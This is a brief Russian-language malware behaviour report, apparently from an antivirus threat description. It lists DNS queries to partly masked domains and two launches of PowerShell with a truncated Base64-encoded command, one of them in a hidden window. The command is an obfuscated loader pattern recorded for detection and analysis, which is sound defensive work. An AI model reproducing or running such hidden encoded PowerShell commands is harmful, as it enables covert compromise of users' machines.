Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAHgANAAwADAANgA2ADAAMQAwADgAPQAnAGMANwAwAHgAOABjADgAMwA3ADEAMAAwACcAOwAkAHgANQAzADAAMwA5ADAAMAB...
- DNS ASK ja###stle.com
- DNS ASK ni####windarti.com
- DNS ASK nd##c.org
- DNS ASK po######nailboutique.com
- DNS ASK br###-sa.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAHgANAAwADAANgA2ADAAMQAwADgAPQAnAGMANwAwAHgAOABjADgAMwA3ADEAMAAwACcAOwAkAHgANQAzADAAMwA5ADAAMAB...' (со скрытым окном)